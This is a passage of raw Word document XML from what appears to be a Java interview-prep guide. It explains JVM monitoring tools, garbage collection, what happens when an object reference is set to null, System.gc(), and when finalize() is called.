      </w:r>
    </w:p>
    <w:p w14:paraId="1E9DF5DE" w14:textId="44916339" w:rsidR="001D7D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7D1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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w:t>
      </w:r>
      <w:r w:rsidR="002B008F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>visualvm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15D476" w14:textId="3BB7C62F" w:rsidR="001D7D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="001D7D1B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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w:t>
      </w:r>
      <w:r w:rsidR="002B008F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9B125A" w14:textId="77777777" w:rsidR="001D7D1B" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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CViewer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3217B5F9" w14:textId="1D44486C" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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 Flight Recorder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB0759" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F" w:rsidP="002B008F">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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685C49E" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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GC is Java's way of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic memory management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D4885C" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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helps </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>keep memory clean</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by removing unused objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78801CA4" w14:textId="77777777" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="002B008F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Developers </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>don’t control</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> GC directly, but they can influence it with tuning and understanding object lifecycles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E8C603" w14:textId="175D622A" w:rsidR="002B008F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="002B008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1E7F5E9D">
          <v:rect id="_x0000_i1293" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABEE65C" w14:textId="77777777" w:rsidR="007203D9" w:rsidRPr="00CE4B95" w:rsidRDefault="007203D9" w:rsidP="007203D9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc196307584"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What will happen if I assign null to some object then will that be garbage collected?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w14:paraId="09644120" w14:textId="4A08A434" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00177E73">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you assign null to an object in Java, it </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>does not immediately trigger garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here's what happens step by step:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66232B9C" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F2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Assigning null:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4CE858" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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assign null to an object reference, like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177A6EA8" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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yObject obj = new MyObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF3F214" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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bj = null;  // obj no longer points to the MyObject instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9ADB4E" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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object that obj was originally pointing to is now </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible for garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because there are no active references pointing to it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DC2AB5" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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memory occupied by the object is not immediately reclaimed. It's just marked as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible for garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035F46D6" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F2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Garbage Collection (GC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D3490" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-deterministic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning you cannot predict when exactly the garbage collector will run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56467AB0" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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GC process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs in the background to free up memory by reclaiming objects that are no longer referenced by any part of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DD8DDF" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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there are no references to the object (like obj = null), the object is eventually collected during a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GC cycle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16989F59" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F2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What happens after null assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7825CC0E" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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immediate action</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Assigning null to an object doesn't directly cause the object to be destroyed or memory to be reclaimed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D12342A" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="58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Garbage Collection happens later</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The JVM will eventually decide when to run the GC, and during that cycle, it will clean up objects that are no longer reachable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E680B7F" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F2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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188DD19E" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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public class Example {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AF6302" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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4A75F794" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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Object obj = new MyObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA7B6EB" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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bj = null;  // The object that was originally referenced is now eligible for GC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F211A27" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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3F540A1" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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2BD4112" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F28">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11762E8D" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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MyObject {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE496FC" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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ome fields or methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4581317D" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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85470A4" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F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 after obj = null;, the object is eligible for GC, but it will be cleaned up only during the next garbage collection cycle, which may not be immediate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A71EA18" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F2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Garbage Collection Trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2E5C21" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>request garbage collection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> manually (though not recommended for production) using System.gc(), but this is just a suggestion to the JVM and does not guarantee immediate collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60914DC8" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59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actual garbage collection will depend on the JVM's decision and system memory management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4161CBCC" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28" w:rsidP="00EC1F2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 Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD4184A" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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ssigning null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes the object </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for garbage collection, but it does not automatically trigger it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B4BE26" w14:textId="77777777" w:rsidR="00EC1F28" w:rsidRPr="00CE4B95" w:rsidRDefault="00EC1F28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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arbage collection is handled by the JVM in the background, and you cannot directly control when it occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527D9BC1" w14:textId="53617286" w:rsidR="00051BE0" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00322B4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37CD206B">
          <v:rect id="_x0000_i1294" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42158920" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E7005">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="105" w:name="_Toc196307585"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>When does the finalize method get called?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="105"/>
    </w:p>
    <w:p w14:paraId="0BB22C76" w14:textId="4013C8B4" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="00206B18">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finalize() method is called </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>by the Garbage Collector (GC)</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just before</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> an object is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>destroyed (i.e., garbage collected)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to give it a chance to clean up resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D606AC8" w14:textId="7425743D" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E7005">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ED522D" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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Poi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0"/>
        <w:gridCol w:w="8834"/>
      </w:tblGrid>
      <w:tr w:rsidR="002E7005" w:rsidRPr="00CE4B95" w14:paraId="154263CC" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="597641D1" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="00B476C9">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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28C7D4FB" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="00B476C9">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2E7005" w:rsidRPr="00CE4B95" w14:paraId="601F33DC" w14:textId="77777777" w:rsidTr="002E7005">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EFB4EF2" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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hen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A10587A" w14:textId="77777777" w:rsidR="002E7005" w:rsidRPr="00CE4B95" w:rsidRDefault="002E7005" w:rsidP="002E700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utomatically called </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>before the GC reclaims the object's memory</w:t>
            </w:r>
          </w:p>
